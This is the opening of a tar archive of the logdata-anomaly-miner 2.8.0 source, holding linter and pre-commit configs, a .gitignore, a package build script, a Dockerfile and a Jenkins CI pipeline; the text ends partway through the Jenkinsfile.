pax_global_header00006660000000000000000000000064150047630170014515gustar00rootroot0000000000000052 comment=b44fb9baa6a3c2bfef160edb4e2333c2f63d58c2 logdata-anomaly-miner-2.8.0/000077500000000000000000000000001500476301700157055ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/.bandit000066400000000000000000000002241500476301700171450ustar00rootroot00000000000000[bandit] exclude = aecid-testsuite/unit,.venv,/usr/lib/logdata-anomaly-miner/aecid-testsuite/unit,/usr/lib/logdata-anomaly-miner/.venv skips = B108 logdata-anomaly-miner-2.8.0/.flake8000066400000000000000000000005231500476301700170600ustar00rootroot00000000000000[flake8] exclude = aecid-testsuite/unit,aecid-testsuite/system,aecid-testsuite/integration,.venv,/usr/lib/logdata-anomaly-miner/aecid-testsuite/unit,/usr/lib/logdata-anomaly-miner/aecid-testsuite/system,/usr/lib/logdata-anomaly-miner/aecid-testsuite/integration,/usr/lib/logdata-anomaly-miner/.venv max-line-length = 140 statistics = True logdata-anomaly-miner-2.8.0/.github/000077500000000000000000000000001500476301700172455ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/.github/pull_request_template.md000066400000000000000000000012661500476301700242130ustar00rootroot00000000000000# Make sure these boxes are signed before submitting your Pull Request -- thank you. # Must haves - [ ] I have read and followed the contributing guide lines at https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Git-development-workflow - [ ] Issues exist for this PR - [ ] I added related issues using the "Fixes #"-notations - [ ] This Pull-Requests merges into the "development"-branch Fixes # # Submission specific - [ ] This PR introduces breaking changes - [ ] My change requires a change to the documentation - [ ] I have updated the documentation accordingly - [ ] I have added tests to cover my changes - [ ] All new and existing tests passed # Describe changes: - logdata-anomaly-miner-2.8.0/.gitignore000066400000000000000000000043741500476301700177050ustar00rootroot00000000000000# Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class # vim *.swp # C extensions *.so # Distribution / packaging .Python build/ develop-eggs/ dist/ downloads/ eggs/ .eggs/ parts/ sdist/ var/ wheels/ share/python-wheels/ *.egg-info/ .installed.cfg *.egg MANIFEST # PyInstaller # Usually these files are written by a python script from a template # before PyInstaller builds the exe, so as to inject date/other infos into it. *.manifest *.spec # Installer logs pip-log.txt pip-delete-this-directory.txt # Unit test / coverage reports htmlcov/ .tox/ .nox/ .coverage .coverage.* .cache nosetests.xml coverage.xml *.cover *.py,cover .hypothesis/ .pytest_cache/ cover/ # Translations *.mo *.pot # Flask stuff: instance/ .webassets-cache # Scrapy stuff: .scrapy # Sphinx documentation _build docs/_build/ docs/Wiki docs/SECURITY.md docs/README.md docs/LICENSE.md #docker akafka/ aminercfg/ persistency/ logs/ # PyBuilder .pybuilder/ target/ # Jupyter Notebook .ipynb_checkpoints # IPython profile_default/ ipython_config.py # pyenv # For a library or package, you might want to ignore these files since the code is # intended to run in multiple environments; otherwise, check them in: # .python-version # pipenv # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. # However, in case of collaboration, if having platform-specific dependencies or dependencies # having no cross-platform support, pipenv may install dependencies that don't work, or not # install all needed dependencies. #Pipfile.lock # PEP 582; used by e.g. github.com/David-OConnor/pyflow __pypackages__/ # Celery stuff celerybeat-schedule celerybeat.pid # SageMath parsed files *.sage.py # Environments .env .venv env/ venv/ ENV/ env.bak/ venv.bak/ # PyCharm IDE .idea/ # Spyder project settings .spyderproject .spyproject # Rope project settings .ropeproject # mkdocs documentation /site # mypy .mypy_cache/ .dmypy.json dmypy.json # Pyre type checker .pyre/ # pytype static type analyzer .pytype/ # Cython debug symbols cython_debug/ # ignore ansible-roles roles/ playbook.yml playbook.retry # for testing aecid-testsuite/aminer aecid-testsuite/demo/aminer/template_config.py # Aminer Docker Volumes aminercfg/ persistency/ logs/ logdata-anomaly-miner-2.8.0/.playbook.yml000066400000000000000000000003161500476301700203260ustar00rootroot00000000000000# aminer-ansible: https://github.com/ait-aecid/aminer-ansible.git - hosts: localhost vars: aminer_gitrepo: False # MODIFY THIS PATH aminer_repopath: "{{SOURCEDIR}}" roles: - aminer logdata-anomaly-miner-2.8.0/.pre-commit-config.yaml000066400000000000000000000040201500476301700221620ustar00rootroot00000000000000# See https://pre-commit.com for more information # See https://pre-commit.com/hooks.html for more hooks repos: - repo: https://github.com/pre-commit/pre-commit-hooks rev: v4.6.0 hooks: - id: trailing-whitespace exclude: aecid-testsuite/runAminerXmlInputDemo.sh - id: end-of-file-fixer - id: check-yaml exclude: aecid-testsuite/unit/data/configfiles/invalid_config.yml - id: check-added-large-files - id: check-ast - id: check-docstring-first - id: check-executables-have-shebangs - id: check-shebang-scripts-are-executable - id: check-symlinks - id: check-toml - id: check-xml - repo: https://github.com/pre-commit/pygrep-hooks rev: v1.10.0 hooks: - id: python-check-blanket-noqa - id: python-no-log-warn - repo: https://github.com/pre-commit/mirrors-mypy rev: v1.10.0 hooks: - id: mypy additional_dependencies: [pydantic, types-PyYAML] args: [--install-types, --ignore-missing-imports, --disable-error-code=attr-defined, --implicit-optional] exclude: aecid-testsuite|source/root/usr/lib/logdata-anomaly-miner/aminer/__init__.py - repo: https://github.com/PyCQA/flake8 rev: 7.0.0 hooks: - id: flake8 exclude: ^aecid-testsuite/unit/|^aecid-testsuite/system/|^aecid-testsuite/integration/|.venv/ args: [--statistics] - repo: https://github.com/PyCQA/docformatter rev: v1.7.5 hooks: - id: docformatter exclude: ^aecid-testsuite/unit/|^aecid-testsuite/system/|^aecid-testsuite/integration/|.venv/ - repo: https://github.com/PyCQA/bandit rev: 1.7.8 hooks: - id: bandit exclude: ^aecid-testsuite/ - repo: https://github.com/jendrikseipp/vulture rev: 'v2.11' hooks: - id: vulture - repo: https://github.com/pre-commit/mirrors-autopep8 rev: v2.0.4 hooks: - id: autopep8 args: [--max-line-length=140, --diff] exclude: ^aecid-testsuite/unit/|^aecid-testsuite/system/|^aecid-testsuite/integration/|.venv/ logdata-anomaly-miner-2.8.0/AUTHORS000066400000000000000000000004451500476301700167600ustar00rootroot00000000000000Roman Fiedler Markus Wurzenberger Max Landauer Wolfgang Hotwagner Ernst Leierzopf Georg Hoeld Florian Skopik Daniel Klimas logdata-anomaly-miner-2.8.0/Build000077500000000000000000000042421500476301700166740ustar00rootroot00000000000000#!/bin/bash -e # Build script wrapper # # How to use: # # * Build package only in temporary location _tmpRoot, # use it also for storing of temporary files (which should be # removed before creating the package). The directory is deleted # at the end of the script. By using it that way, no garbage files # are left over after building and symlink attacks on temporary # directories are prevented. # # The script will place the new packages in the current working # directory, overwriting any existing files of same name. if [ "${EUID} ${UID}" = "0 0" ] && touch /fake-root-detect 2> /dev/null; then rm /fake-root-detect echo "Build should not be run as root!" >&2 exit 1 fi # Export tmp dir to allow large package builds within vservers export TMPDIR="/var/tmp" _projectDir="$(pwd)" # Use a temporary directory for building, no need to keep it. _tmpRoot="$(mktemp -d)" echo "Building package at ${_tmpRoot}" >&2 _debDirectory="${_tmpRoot}/deb-build" _tarVersion=$(head -1 debian/changelog | awk 'match($0, /\(.*\)/) { print substr($0, RSTART+1, RLENGTH-4) } ') mkdir -- "${_debDirectory}" cp -a -- "${_projectDir}/debian" "${_projectDir}/source/root" "${_debDirectory}" cp -a -- "${_projectDir}/README.md" "${_debDirectory}" fakeroot -- tar -C ${_debDirectory} -czf "${_tmpRoot}/logdata-anomaly-miner_${_tarVersion}.orig.tar.gz" --transform 's,^./,deb-build/,' . gpg -ab "${_tmpRoot}/logdata-anomaly-miner_${_tarVersion}.orig.tar.gz" # Build packages: # -F: full build # -us: unsigned sorce # -uc: unsigned changes # -sa: force inclusion of original source (set -e; cd -- "${_debDirectory}"; dpkg-buildpackage -S -us -uc -sa; dpkg-buildpackage -b -uc) rm -rf -- "${_debDirectory}" cp -a -- "${_tmpRoot}/logdata-anomaly-miner_"* . rm -rf -- "${_tmpRoot}" # Build the alienated package for CentOS/Redhat. _debFileName="$(ls -- logdata-anomaly-miner_*_all.deb)" _debVersion="$(echo "${_debFileName}" | sed -r -e 's/logdata-anomaly-miner_([0-9a-z.~-]+)_all.deb/\1/')" fakeroot -- /usr/bin/alien --to-rpm "${_debFileName}" mv -i -- "logdata-anomaly-miner-${_debVersion}-2.noarch.rpm" "logdata-anomaly-miner-${_debVersion}-2.noarch.alien.rpm" < /dev/null echo "Build successful" >&2 logdata-anomaly-miner-2.8.0/Dockerfile000066400000000000000000000060001500476301700176730ustar00rootroot00000000000000# logdata-anomaly-miner Dockerfile # # Use build-script to create docker: # scripts/build_docker.sh # # Build manually: # docker build -t aecid/logdata-anomaly-miner:latest -t aecid/logdata-anomaly-miner:$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') . # # See: https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Deployment-with-Docker # # Pull base image. FROM debian:bookworm ARG UNAME=aminer ARG UID=1000 ARG GID=1000 ARG varbranch="main" ENV BRANCH=$varbranch # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary debian packages ARG DEBIAN_FRONTEND=noninteractive RUN apt-get update && apt-get install -y --no-install-recommends apt-utils RUN apt-get update && apt-get install -y \ supervisor \ python3 \ python3-pip \ libacl1-dev \ sudo \ rsyslog # Docs RUN apt-get update && apt-get install -y \ python3-sphinx \ python3-sphinx-rtd-theme \ python3-recommonmark \ make ADD . /home/aminer/logdata-anomaly-miner RUN cd /home/aminer/logdata-anomaly-miner && scripts/aminer_install.sh -b $BRANCH -s /home/aminer/logdata-anomaly-miner # For Docs ADD docs /docs ADD README.md /docs ADD SECURITY.md /docs ADD LICENSE /docs/LICENSE.md # Copy logdata-anomaly-miner-sources ADD source/root/usr/lib/logdata-anomaly-miner /usr/lib/logdata-anomaly-miner # copy these files instead as symlinks would need absolute paths. ADD source/root/etc/aminer/conf-available/ait-lds/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/ait-lds2/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/generic/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/ait-lds /etc/aminer/conf-available/ait-lds ADD source/root/etc/aminer/conf-available/ait-lds2 /etc/aminer/conf-available/ait-lds2 ADD source/root/etc/aminer/conf-available/generic /etc/aminer/conf-available/generic # Entrypoint-wrapper ADD scripts/aminerwrapper.sh /aminerwrapper.sh # Prepare the system and link all python-modules RUN chmod 0755 /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py \ && chmod 0755 /etc/aminer \ && mkdir -p /var/lib/aminer/logs \ && chown $UID.$GID -R /var/lib/aminer \ && chown $UID.$GID -R /docs \ && chmod 0755 /aminerwrapper.sh RUN PACK=$(find /usr/lib/python3/dist-packages -name posix1e.cpython\*.so) && FILE=$(echo $PACK | awk -F '/' '{print $NF}') ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE # Prepare Supervisord COPY scripts/supervisord.conf /etc/supervisor/conf.d/supervisord.conf RUN mkdir /var/lib/supervisor && chown $UID.$GID -R /var/lib/supervisor \ && chown $UID.$GID -R /var/log/supervisor/ USER aminer WORKDIR /home/aminer # The following volumes can be mounted VOLUME ["/etc/aminer","/var/lib/aminer","/logs"] ENTRYPOINT ["/aminerwrapper.sh"] # Default command for the ENTRYPOINT(wrapper) CMD ["aminer","--config","/etc/aminer/config.yml"] logdata-anomaly-miner-2.8.0/Jenkinsfile000066400000000000000000000770741500476301700201100ustar00rootroot00000000000000void setBuildStatus(String message, String state) { step([ $class: "GitHubCommitStatusSetter", reposSource: [$class: "ManuallyEnteredRepositorySource", url: "https://github.com/ait-aecid/logdata-anomaly-miner"], contextSource: [$class: "ManuallyEnteredCommitContextSource", context: "ci/jenkins/build-status"], errorHandlers: [[$class: "ChangingBuildStatusErrorHandler", result: "UNSTABLE"]], statusResultSource: [ $class: "ConditionalStatusResultSource", results: [[$class: "AnyBuildResult", message: message, state: state]] ] ]); } def ubuntu20image = false def ubuntu22image = false def ubuntu24image = false def debianbusterimage = false def debianbullseyeimage = false def debianbookwormimage = false def productionimage = false def docsimage = false def fedoraimage = false def redhatimage = false pipeline { agent any stages { stage("Build Test-Container") { steps { sh "docker build -f aecid-testsuite/Dockerfile -t aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID ." } } stage("Testing") { parallel { stage("Declarative: Static Analysis & Basic Functionality") { steps { sh "echo \"Running static analysis & basic functionality tests.\"" } } stage("Mypy"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runMypy" } } stage("Bandit"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runBandit" } } stage("Vulture"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runVulture" } } stage("Flake8"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runFlake8" } } stage("Mccabe"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runMccabe" } } stage("Release String Check"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runReleaseStringCheck" } } stage("Suspend Mode"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runSuspendModeTest" } } stage("Remote Control"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runRemoteControlTest" } } stage("Integration Test 1"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerIntegrationTest aminerIntegrationTest.sh config.py" } } stage("Integration Test 2"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerIntegrationTest aminerIntegrationTest2.sh config21.py config22.py" } } stage("Offline Mode"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runOfflineMode" } } stage("Unittests") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runUnittests" } } stage("Declarative: Aminer Demo Tests") { steps { sh "echo \"Running AMiner demo tests.\"" } } stage("demo-config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/demo-config.py" } } stage("demo-config.yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/demo-config.yml" } } stage("jsonConverterHandler-demo-config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/jsonConverterHandler-demo-config.py" } } stage("template_config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/template_config.py" } } stage("template_config.yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/template_config.yml" } } stage("Encoding Demo .py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerEncodingDemo demo/aminer/demo-config.py" } } stage("Encoding Demo .yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerEncodingDemo demo/aminer/demo-config.yml" } } stage("Declarative: JSON/XML Input Tests") { steps { sh "echo \"Running JSON/XML input tests.\"" } } stage("JSON Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerJsonInputDemo" } } stage("XML Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerXmlInputDemo" } } stage("AMiner Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-aminer-demo.yml" } } stage("Elastic Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-elastic-demo.yml" } } stage("Eve Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-eve-demo.yml" } } stage("Journal Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-journal-demo.yml" } } stage("Wazuh Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-wazuh-demo.yml" } } stage("Windows Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/windows.yml" } } stage("Declarative: System, Documentation and Wiki Tests") { steps { sh "echo \"Running system, documentation and wiki tests.\"" } } stage("Available Configs") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runConfAvailableTest" } } stage("Debian Bookworm Docker") { steps { script { debianbookwormimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-debian-bookworm:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=debian:bookworm ." sh "mkdir -p /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-debian-bookworm:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Debian Bullseye Docker") { steps { script { debianbullseyeimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=debian:bullseye ." sh "mkdir -p /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Debian Buster Docker") { steps { script { debianbusterimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=debian:buster ." sh "mkdir -p /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Production Docker Image") { steps { script { productionimage = true } sh "docker build -f Dockerfile -t aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development ." sh "mkdir -p /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Ubuntu 24.04 Docker") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } steps { script { ubuntu24image = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-ubuntu-2404:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=ubuntu:24.04 ." sh "mkdir -p /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/ubuntu-2404-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-ubuntu-2404:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Ubuntu 22.04 Docker") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } steps { script { ubuntu22image = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-ubuntu-2204:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=ubuntu:22.04 ." sh "mkdir -p /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/ubuntu-2204-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-ubuntu-2204:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Ubuntu 20.04 Docker") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } steps { script { ubuntu20image = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development 